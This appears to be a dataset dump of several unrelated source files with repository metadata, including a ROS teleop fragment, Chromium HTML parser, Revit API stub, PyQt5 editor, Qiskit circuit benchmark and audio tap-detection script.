print(x*speed,th*turn)
msg = AckermannDriveStamped();
msg.header.stamp = rospy.Time.now();
msg.header.frame_id = "base_link";
msg.drive.speed = x*speed
msg.drive.acceleration = 1
msg.drive.jerk = 1
msg.drive.steering_angle = th*turn
msg.drive.steering_angle_velocity = 1
pub.publish(msg)
except:
print 'error'
finally:
msg = drive_param()
msg.velocity = 0
msg.angle = 0
msg = AckermannDriveStamped();
msg.header.stamp = rospy.Time.now();
msg.header.frame_id = "base_link";
msg.drive.speed = x*speed
msg.drive.acceleration = 1
msg.drive.jerk = 1
msg.drive.steering_angle = th*turn
msg.drive.steering_angle_velocity = 1
pub.publish(msg)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
| [
"[email protected]"
] | |
06c5cd504516c90e7f07c7a903062d100667cc1e | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /third_party/catapult/third_party/py_vulcanize/py_vulcanize/parse_html_deps.py | 6fbe31daac48d0626acb4efdd44a3050c975ead4 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 5,738 | py | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
from py_vulcanize import module
from py_vulcanize import strip_js_comments
from py_vulcanize import html_generation_controller
def _AddToPathIfNeeded(path):
if path not in sys.path:
sys.path.insert(0, path)
def _InitBeautifulSoup():
catapult_path = os.path.abspath(
os.path.join(os.path.dirname(__file__),
os.path.pardir, os.path.pardir, os.path.pardir))
bs_path = os.path.join(catapult_path, 'third_party', 'beautifulsoup4')
_AddToPathIfNeeded(bs_path)
html5lib_path = os.path.join(catapult_path, 'third_party', 'html5lib-python')
_AddToPathIfNeeded(html5lib_path)
six_path = os.path.join(catapult_path, 'third_party', 'six')
_AddToPathIfNeeded(six_path)
_InitBeautifulSoup()
import bs4
class InlineScript(object):
def __init__(self, soup):
if not soup:
raise module.DepsException('InlineScript created without soup')
self._soup = soup
self._stripped_contents = None
self._open_tags = None
@property
def contents(self):
return unicode(self._soup.string)
@property
def stripped_contents(self):
if not self._stripped_contents:
self._stripped_contents = strip_js_comments.StripJSComments(
self.contents)
return self._stripped_contents
@property
def open_tags(self):
if self._open_tags:
return self._open_tags
open_tags = []
cur = self._soup.parent
while cur:
if isinstance(cur, bs4.BeautifulSoup):
break
open_tags.append(_Tag(cur.name, cur.attrs))
cur = cur.parent
open_tags.reverse()
assert open_tags[-1].tag == 'script'
del open_tags[-1]
self._open_tags = open_tags
return self._open_tags
def _CreateSoupWithoutHeadOrBody(html):
soupCopy = bs4.BeautifulSoup(html, 'html5lib')
soup = bs4.BeautifulSoup()
soup.reset()
if soupCopy.head:
for n in soupCopy.head.contents:
n.extract()
soup.append(n)
if soupCopy.body:
for n in soupCopy.body.contents:
n.extract()
soup.append(n)
return soup
class HTMLModuleParserResults(object):
def __init__(self, html):
self._soup = bs4.BeautifulSoup(html, 'html5lib')
self._inline_scripts = None
@property
def scripts_external(self):
tags = self._soup.findAll('script', src=True)
return [t['src'] for t in tags]
@property
def inline_scripts(self):
if not self._inline_scripts:
tags = self._soup.findAll('script', src=None)
self._inline_scripts = [InlineScript(t.string) for t in tags]
return self._inline_scripts
@property
def imports(self):
tags = self._soup.findAll('link', rel='import')
return [t['href'] for t in tags]
@property
def stylesheets(self):
tags = self._soup.findAll('link', rel='stylesheet')
return [t['href'] for t in tags]
@property
def inline_stylesheets(self):
tags = self._soup.findAll('style')
return [unicode(t.string) for t in tags]
def YieldHTMLInPieces(self, controller, minify=False):
yield self.GenerateHTML(controller, minify)
def GenerateHTML(self, controller, minify=False, prettify=False):
soup = _CreateSoupWithoutHeadOrBody(unicode(self._soup))
# Remove declaration.
for x in soup.contents:
if isinstance(x, bs4.Doctype):
x.extract()
# Remove declaration.
for x in soup.contents:
if isinstance(x, bs4.Declaration):
x.extract()
# Remove all imports.
imports = soup.findAll('link', rel='import')
for imp in imports:
imp.extract()
# Remove all script links.
scripts_external = soup.findAll('script', src=True)
for script in scripts_external:
script.extract()
# Remove all in-line scripts.
scripts_external = soup.findAll('script', src=None)
for script in scripts_external:
script.extract()
# Process all in-line styles.
inline_styles = soup.findAll('style')
for style in inline_styles:
html = controller.GetHTMLForInlineStylesheet(unicode(style.string))
if html:
ns = soup.new_tag('style')
ns.append(bs4.NavigableString(html))
style.replaceWith(ns)
else:
style.extract()
# Rewrite all external stylesheet hrefs or remove, as needed.
stylesheet_links = soup.findAll('link', rel='stylesheet')
for stylesheet_link in stylesheet_links:
html = controller.GetHTMLForStylesheetHRef(stylesheet_link['href'])
if html:
tmp = bs4.BeautifulSoup(html, 'html5lib').findAll('style')
assert len(tmp) == 1
stylesheet_link.replaceWith(tmp[0])
else:
stylesheet_link.extract()
# Remove comments if minifying.
if minify:
comments = soup.findAll(
text=lambda text: isinstance(text, bs4.Comment))
for comment in comments:
comment.extract()
if prettify:
return soup.prettify('utf-8').strip()
# We are done.
return unicode(soup).strip()
@property
def html_contents_without_links_and_script(self):
return self.GenerateHTML(
html_generation_controller.HTMLGenerationController())
class _Tag(object):
def __init__(self, tag, attrs):
self.tag = tag
self.attrs = attrs
def __repr__(self):
attr_string = ' '.join('%s="%s"' % (x[0], x[1]) for x in self.attrs)
return '<%s %s>' % (self.tag, attr_string)
class HTMLModuleParser():
def Parse(self, html):
if html is None:
html = ''
else:
if html.find('< /script>') != -1:
raise Exception('Escape script tags with <\/script>')
return HTMLModuleParserResults(html)
| [
"[email protected]"
] | |
1132547772e06d6b2ee93fee62cd3605b759ec0c | 60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24 | /IronPythonStubs/release/stubs.min/Autodesk/Revit/DB/__init___parts/BindingMap.py | 686d18be3c7071d131cd785f06980c6c9a4a0c07 | [
"MIT"
] | permissive | shnlmn/Rhino-Grasshopper-Scripts | a9411098c5d1bbc55feb782def565d535b27b709 | 0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823 | refs/heads/master | 2020-04-10T18:59:43.518140 | 2020-04-08T02:49:07 | 2020-04-08T02:49:07 | 161,219,695 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | class BindingMap(DefinitionBindingMap,IDisposable,IEnumerable):
"""
The parameters BindingMap contains all the parameter bindings that exist in the
Autodesk Revit project.
"""
def Clear(self):
"""
Clear(self: BindingMap)
This method is used to remove all the items in the map.
"""
pass
def Contains(self,key):
"""
Contains(self: BindingMap,key: Definition) -> bool
The Contains method is used to check if the parameter binding exists for one
definition.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def Dispose(self):
""" Dispose(self: BindingMap,A_0: bool) """
pass
def Erase(self,key):
"""
Erase(self: BindingMap,key: Definition) -> int
This method is used to erase one item in the map.
"""
pass
def Insert(self,key,item,parameterGroup=None):
"""
Insert(self: BindingMap,key: Definition,item: Binding) -> bool
Creates a new parameter binding between a parameter and a set of categories.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
Insert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Creates a new parameter binding between a parameter and a set of categories in
a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReInsert(self,key,item,parameterGroup=None):
"""
ReInsert(self: BindingMap,key: Definition,item: Binding) -> bool
Removes an existing parameter and creates a new binding for a given parameter.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
ReInsert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Removes an existing parameter and creates a new binding for a given parameter
in a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReleaseManagedResources(self,*args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: APIObject) """
pass
def Remove(self,key):
"""
Remove(self: BindingMap,key: Definition) -> bool
The Remove method is used to remove a parameter binding.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
| [
"[email protected]"
] | |
45ae02db652e3be0161f27e1c06dc8c4cd2cc2e5 | 11398875e4f5cbcadc1747e73049dc99bca26908 | /06-time/time-01.py | 7f952d5930c3c2ef4b13a8eec60178b112e90857 | [] | no_license | asvkarthick/LearnPython | 37910faab5c4a18d6e08eb304ca1da9649e5b18f | 258e8c567ca3c8802d5e56f20b34317eba4c75f3 | refs/heads/master | 2021-06-23T06:30:46.681369 | 2021-06-11T19:35:40 | 2021-06-11T19:35:40 | 149,719,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | #!/usr/bin/python
# Author: Karthick Kumaran <[email protected]>
import time
print('Sleeping for 2 seconds')
time.sleep(2)
print('Done')
| [
"[email protected]"
] | |
83774ee8ba86d36addb91c1a11753509b4785fd5 | 16a2ac198a36d7633c62d41f4604356cd0ae732e | /Au-public-master/iron/utilities/rename_to_pacbio.py | 7b73810b42d4d374c9af78099e87739af78271c2 | [
"Apache-2.0"
] | permissive | Dingjie-Wang/Manual-for-running-IDP-pipeline | f433ba5b0dbd44da5a9d8836b3e29a27e12a48c4 | 6c2756e10184f0b8f0e5872a358378e90f1729b0 | refs/heads/master | 2021-06-29T04:02:56.741203 | 2020-12-07T17:39:05 | 2020-12-07T17:39:05 | 201,325,604 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 1,878 | py | #!/usr/bin/python
import sys,argparse
from SequenceBasics import FastaHandleReader, FastqHandleReader
def main():
parser = argparse.ArgumentParser()
parser.add_argument('input',help="Use - for STDIN")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--fasta',action='store_true')
group.add_argument('--fastq',action='store_true')
group.add_argument('--gpd',action='store_true')
parser.add_argument('--output_table',help='save coversion to file')
parser.add_argument('-o','--output')
args = parser.parse_args()
if args.input=='-': args.input = sys.stdin
else: args.input= open(args.input)
if args.output: args.output = open(args.output,'w')
if args.output_table: args.output_table= open(args.output_table,'w')
else: args.output = sys.stdout
if args.gpd:
z = 0
for line in args.input:
f = line.rstrip().split("\t")
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.output_table: args.output_table.write(f[0]+"\t"+name+"\n")
f[0] = name
f[1] = name
args.output.write("\t".join(f)+"\n")
args.output.close()
if args.output_table:
args.output_table.close()
return
if args.fasta:
args.input = FastaHandleReader(args.input)
elif args.fastq:
args.input = FastqHandleReader(args.input)
z = 0
while True:
e = args.input.read_entry()
if not e: break
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.fastq:
args.output.write( '@'+name+"\n"+ e['seq']+"\n"+ '+'+e['qual']+"\n")
elif args.fasta:
args.output.write('>'+name+"\n"+e['seq']+"\n")
if args.output_table: args.output_table.write(e['name']+"\t"+name+"\n")
args.output.close()
if args.output_table: args.output_table.close()
if __name__=="__main__":
main()
| [
"[email protected]"
] | |
fdc482ebab30deb95941025999cd0e9ef8238969 | b6cf41b1eadb6571e30998712da651ec62db07ad | /Gui/TextEdit.py | ceb67896e0bb84b333873a5b082f3dbedb16f3f7 | [] | no_license | fdanesse/CoralEditor | 8d1949ff86af61d44d573d544a3b76dbc182b5d4 | e42239f75ee921c99d13e60758b32ca5862c303f | refs/heads/master | 2021-08-14T07:14:19.203753 | 2017-11-15T00:06:11 | 2017-11-15T00:06:11 | 107,883,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,380 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QEvent
from PyQt5.QtWidgets import QPlainTextEdit
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QPalette
from PyQt5.QtGui import QColor
from PyQt5.QtGui import QFont
from PyQt5.QtGui import QFontMetrics
from PyQt5.QtGui import QTextCharFormat
from PyQt5.QtGui import QKeyEvent
#from PyQt5.QtGui import QTextCursor
#from Gui.Syntax.PythonHighlighter import PythonHighlighter
class TextEdit(QPlainTextEdit):
# https://doc.qt.io/qt-5/qplaintextedit.html
# https://github.com/hugoruscitti/pilas/blob/e33bfd80a9c9faec432dbd3de1d82066b8704303/pilasengine/interprete/editorbase/editor_base.py
# http://www.binpress.com/tutorial/developing-a-pyqt-text-editor-part-2/145
# http://ftp.ics.uci.edu/pub/centos0/ics-custom-build/BUILD/PyQt-x11-gpl-4.7.2/doc/html/qtextedit.html
# http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@tools@[email protected]/92/PyQt5.QtWidgets.QTextEdit.textCursor
# http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@richtext@[email protected]/87/PyQt5.QtWidgets.QTextEdit.setFocus
# Ejemplos:
# https://stackoverflow.com/questions/31610351/qplaintextedit-thinks-its-modified-if-it-has-an-empty-text
# https://john.nachtimwald.com/2009/08/19/better-qplaintextedit-with-line-numbers/
# https://github.com/Werkov/PyQt4/blob/master/examples/demos/textedit/textedit.py
def __init__(self, parent, path=""):
#super().__init__()
super(TextEdit, self).__init__(parent)
self.parent = parent
self.path = path
font = QFont("Monospace", 8) #QFont()
#font.setFamily("Monospace")
font.setStyleHint(QFont.Monospace)
font.setStyle(QFont.StyleNormal)
font.setStyleStrategy(QFont.PreferDefault)
font.setWeight(QFont.ExtraLight)
font.setCapitalization(QFont.MixedCase)
font.setHintingPreference(QFont.PreferDefaultHinting)
font.setLetterSpacing(QFont.PercentageSpacing, 100.0)
font.setStretch(QFont.AnyStretch)
font.setBold(False)
font.setFixedPitch(True)
font.setItalic(False)
font.setKerning(True)
font.setOverline(False) # sobrelinea
#font.setPixelSize(8) #font.setPointSize(8) font.setPointSizeF(8)
font.setStrikeOut(False) # tachado
#font.setStyleName()
font.setUnderline(False)
#font.setWordSpacing(1)
print(font.toString())
charFormat = QTextCharFormat()
charFormat.setFont(font)
#self.setTabStopWidth(4)
self.setCursorWidth(5)
self.setCurrentCharFormat(charFormat)
#print(self.document().defaultTextOption())
#FIXME: Usaremos qss
pal = QPalette()
bgc = QColor(39, 40, 34)
pal.setColor(QPalette.Base, bgc)
textc = QColor(255, 255, 255)
pal.setColor(QPalette.Text, textc)
self.setPalette(pal)
self.setLineWrapMode(QPlainTextEdit.NoWrap)
#self.setTextBackgroundColor(QColor(0, 255, 255))
#self.setTextColor(QColor(0, 255, 255))
#self.setFontWeight(QFont.Normal)
#cursor = self.textCursor()
#cursor.movePosition(QTextCursor.End)
#self.setDocumentTitle("Coso")
#self.syntaxHighlighter = PythonHighlighter(self.document())
# Señales
#self.blockCountChanged.connect(self.__newBlock)
#self.cursorPositionChanged.connect()
#self.selectionChanged.connect(self.__changedSelection)
#self.textChanged.connect(self.__changedText)
#self.updateRequest.connect((const QRect &rect, int dy)
#self.modificationChanged.connect(self.__chanedModification)
#self.copyAvailable.connect(self.__copyAvailable)
#self.undoAvailable.connect(self.__undoAvailable)
#self.redoAvailable.connect(self.__redoAvailable)
if os.path.exists(self.path):
file = open(self.path, 'r')
data = file.read()
texto = self.__limpiar_codigo(data)
self.setPlainText(texto)
self.document().setModified(data != texto)
if data != texto:
print("El texto fue corregido al abrir el archivo.")
else:
self.setPlainText("#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n")
self.document().setModified(True)
self.setFocus()
def getStatus(self):
"""
Si se modifica el texto, se puede guardar.
"""
return{
"modified": self.document().isModified(),
}
#def __chanedModification(self, changed):
# pass
# #print("Document changed:", changed)
#def __changedSelection(self):
# cursor = self.textCursor()
# selected = cursor.selectionEnd()-cursor.selectionStart()
# self.canSelectAll = selected < len(self.toPlainText())
#def __copyAvailable(self, available):
# self.canCopy = available
#def __undoAvailable(self, available):
# pass
# #print("Undo:", available)
#def __redoAvailable(self, available):
# pass
# #print("Redo:", available)
def keyPressEvent(self, event):
# https://doc.qt.io/qt-5/qt.html#Key-enum
if event.key() == Qt.Key_Tab:
event.ignore()
event.accept = True
for x in range(0, 4):
newevent = QKeyEvent(QEvent.KeyPress, Qt.Key_Space,
Qt.NoModifier, text=" ", autorep=False, count=1)
QApplication.postEvent(self, newevent)
else:
super(TextEdit, self).keyPressEvent(event)
event.accept = True
self.setFocus()
'''
def __newBlock(self, newBlockCount):
#print(newBlockCount)
def __changedText(self):
text = self.document().toPlainText()
text = self.__limpiar_codigo(text)
#self.setPlainText(text)
print(text, self.document().size())
'''
def __limpiar_codigo(self, texto):
limpio = ""
for line in texto.splitlines():
text_line = "%s\n" % (line.rstrip())
ret = text_line.replace("\t", " ")
for l in ret:
limpio = "%s%s" % (limpio, l)
return limpio | [
"[email protected]"
] | |
2cbcad6a307bd6d1b5101f9e5781d7caaa236d91 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_QC1087.py | 70d9c4bc57bcaa206e68809763018b4b54d22d38 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,454 | py | # qubit number=5
# total number=50
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=31
prog.cz(input_qubit[1],input_qubit[0]) # number=32
prog.h(input_qubit[0]) # number=33
prog.h(input_qubit[1]) # number=44
prog.cz(input_qubit[0],input_qubit[1]) # number=45
prog.h(input_qubit[1]) # number=46
prog.cx(input_qubit[0],input_qubit[1]) # number=47
prog.x(input_qubit[1]) # number=48
prog.cx(input_qubit[0],input_qubit[1]) # number=49
prog.cx(input_qubit[0],input_qubit[1]) # number=42
prog.x(input_qubit[0]) # number=26
prog.cx(input_qubit[1],input_qubit[0]) # number=27
prog.h(input_qubit[1]) # number=37
prog.cz(input_qubit[0],input_qubit[1]) # number=38
prog.h(input_qubit[1]) # number=39
prog.x(input_qubit[1]) # number=35
prog.cx(input_qubit[0],input_qubit[1]) # number=36
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
prog.cx(input_qubit[3],input_qubit[2]) # number=43
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.cx(input_qubit[0],input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
prog.cx(input_qubit[0],input_qubit[1]) # number=24
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[1]) # number=29
prog.y(input_qubit[4]) # number=28
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC1087.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"[email protected]"
] | |
7620c16b70a5011be660188673a3d70cf943f517 | f305f84ea6f721c2391300f0a60e21d2ce14f2a5 | /4_set/6265. 统计相似字符串对的数目-frozenset.py | a37db3b54e7eb3a906c7279c7abccaff4e9548a7 | [] | no_license | 981377660LMT/algorithm-study | f2ada3e6959338ae1bc21934a84f7314a8ecff82 | 7e79e26bb8f641868561b186e34c1127ed63c9e0 | refs/heads/master | 2023-09-01T18:26:16.525579 | 2023-09-01T12:21:58 | 2023-09-01T12:21:58 | 385,861,235 | 225 | 24 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | from typing import List
from collections import Counter
# 给你一个下标从 0 开始的字符串数组 words 。
# 如果两个字符串由相同的字符组成,则认为这两个字符串 相似 。
# 例如,"abca" 和 "cba" 相似,因为它们都由字符 'a'、'b'、'c' 组成。
# 然而,"abacba" 和 "bcfd" 不相似,因为它们不是相同字符组成的。
# 请你找出满足字符串 words[i] 和 words[j] 相似的下标对 (i, j) ,并返回下标对的数目,其中 0 <= i < j <= word.length - 1 。
class Solution:
def similarPairs(self, words: List[str]) -> int:
counter = Counter()
for word in words:
counter[frozenset(word)] += 1
return sum(v * (v - 1) // 2 for v in counter.values())
| [
"[email protected]"
] | |
8ba8ac218525fe114aef069e508dbd337d9c8b19 | eeeba145ae4b6df7b5d95cc70d476a01dba6c5fe | /PythonStudy/func_test/lambda_test.py | 52286c0eb1edd88d86870e484d66ce35fd90a1e7 | [] | no_license | liujinguang/pystudy | 0ceb58652777f99d4cfe3e143ff11ea44c7e3a74 | d2e4366cfd5e74197fc9ec560eb50dbd508cbcc2 | refs/heads/master | 2020-12-23T13:11:42.556255 | 2017-06-28T13:03:26 | 2017-06-28T13:03:26 | 92,559,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | #/usr/bin/python
# -*- coding: UTF-8 -*-
'''
Created on 2017年5月31日
@author: bob
'''
def multipliers():
return [lambda x : i * x for i in range(4)]
print [m(2) for m in multipliers()]
def multipliers_v1():
for i in range(4):
yield lambda x: i * x
print [m(2) for m in multipliers_v1()]
if __name__ == '__main__':
pass | [
"[email protected]"
] | |
d31988b13f42acd2ad1577ce07a0b7e8506e7ce8 | 925dc0d981391e4538401a7af88fcac25921ccab | /emission/net/api/metrics.py | 20e6b0f9fd1e9cee84bd6847b0c0a85cce6b0ff9 | [
"BSD-3-Clause"
] | permissive | gtfierro/e-mission-server | 0e75742301b3de8d8dd71e6bc3a6e7c0bfe48ee7 | b10c5da080b741b28eccf8cb7413ace3063eaaac | refs/heads/master | 2021-01-19T11:58:24.441986 | 2016-09-30T09:00:54 | 2016-09-30T09:00:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | import logging
import emission.analysis.result.metrics.time_grouping as earmt
import emission.analysis.result.metrics.simple_metrics as earms
def summarize_by_timestamp(user_id, start_ts, end_ts, freq, metric_name):
return _call_group_fn(earmt.group_by_timestamp, user_id, start_ts, end_ts,
freq, metric_name)
def summarize_by_local_date(user_id, start_ld, end_ld, freq_name, metric_name):
local_freq = earmt.LocalFreq[freq_name]
return _call_group_fn(earmt.group_by_local_date, user_id, start_ld, end_ld,
local_freq, metric_name)
def _call_group_fn(group_fn, user_id, start_time, end_time, freq, metric_name):
summary_fn = earms.get_summary_fn(metric_name)
logging.debug("%s -> %s" % (metric_name, summary_fn))
aggregate_metrics = group_fn(None, start_time, end_time,
freq, summary_fn)
ret_dict = {"aggregate_metrics": aggregate_metrics["result"]}
if user_id is not None:
user_metrics = group_fn(user_id, start_time, end_time,
freq, summary_fn)
ret_dict.update({"user_metrics": user_metrics["result"]})
return ret_dict
| [
"[email protected]"
] | |
9c263e0f31066de90cfb7168e44d3f1faaff0d99 | a3d6556180e74af7b555f8d47d3fea55b94bcbda | /ios/chrome/browser/flags/DEPS | 458d0f02f4f533615b90bc6bce32a1ece69f84f1 | [
"BSD-3-Clause"
] | permissive | chromium/chromium | aaa9eda10115b50b0616d2f1aed5ef35d1d779d6 | a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c | refs/heads/main | 2023-08-24T00:35:12.585945 | 2023-08-23T22:01:11 | 2023-08-23T22:01:11 | 120,360,765 | 17,408 | 7,102 | BSD-3-Clause | 2023-09-10T23:44:27 | 2018-02-05T20:55:32 | null | UTF-8 | Python | false | false | 405 | specific_include_rules = {
# Flag list can depends on everything.
"^about_flags.mm": [
"+ios/chrome/browser",
],
"^ios_chrome_field_trials.mm": [
"+ios/chrome/browser/variations",
"+ios/chrome/browser/ui/content_suggestions",
"+ios/chrome/browser/ui/first_run",
"+ios/chrome/browser/ui/ntp",
],
"^system_flags.mm": [
"+ios/chrome/browser/ui/ui_feature_flags.h",
]
}
| [
"[email protected]"
] | ||
865e42f9823db183fe0a661b7ee6ecce678f9a25 | ae411ea0e0c373d18681d707800995264379be25 | /mic.py | df6a5aaf7b2e2a2e146caccea681f70963c889f7 | [] | no_license | Symfomany/tensor | 22ad4b0710d705d1ec47e3512431c2ca74ca3948 | 2b8471f7aab6a7a234bd89942118bbadf4058352 | refs/heads/master | 2022-12-21T14:53:03.349221 | 2019-02-21T10:39:31 | 2019-02-21T10:39:31 | 171,100,643 | 0 | 0 | null | 2022-12-09T13:17:30 | 2019-02-17T08:51:46 | Jupyter Notebook | UTF-8 | Python | false | false | 4,912 | py | #!/usr/bin/env python
import pyaudio
import struct
import math
import time,sys
import threading
INITIAL_TAP_THRESHOLD = 0.010
FORMAT = pyaudio.paInt16
SHORT_NORMALIZE = (1.0/32768.0)
CHANNELS = 1
RATE = 16000
INPUT_BLOCK_TIME = 0.05
INPUT_FRAMES_PER_BLOCK = int(RATE*INPUT_BLOCK_TIME)
OVERSENSITIVE = 15.0/INPUT_BLOCK_TIME
UNDERSENSITIVE = 120.0/INPUT_BLOCK_TIME # if we get this many quiet blocks in a row, decrease the threshold
MAX_TAP_BLOCKS = 0.15/INPUT_BLOCK_TIME # if the noise was longer than this many blocks, it's not a 'tap'
def get_rms(block):
# L’amplitude d’un son est la caractéristique la plus simple que l’on puisse imaginer.
# Elle caractérise directement l’intensité du son c’est à dire son volume, ou encore la force avec laquelle elle excite l’oreille de l’auditeur. S
# Le son qui engendre une vibration d’un corps physique,
# crée des variations de pression qui exercent une force sur les autres corps physiques en contact avec l’air (l’air étant un milieu dit « élastique »).
# Cette force n’étant pas constante (si elle l’est, il n’y a pas de son) le corps en question ne bouge pas mais vibre (si tant est qu’il ne soit pas trop rigide).
# L’amplitude d’un signal est sa valeur maximale.
# Ici l’amplitude du signal qui varie entre la valeur +max et -max est +max.
# En somme, le maximum réel de la fonction sur un intervalle de temps donné.
# Dans le cas d’un signal sinusoïdal (tel que celui ci-dessus) on peut exprimer simplement la valeur efficace du signal par la formule suivante :
# En fait, la valeur efficace, qui est très utilisée (parce que renvoyée par les instruments de mesures :
# un voltmètre par exemple) est la valeur quadratique moyenne.
# Par exemple si la valeur du signal en fonction du temps est donnée par la fonction Y(t)
# on a la formule générale suivante qui donne la valeur efficace du signal sur un intervalle de temps donné :
# Valeur max et valeur efficace sont à mettre en relation avec ce que l’on appelle
# les puissances max et les puissances efficaces.
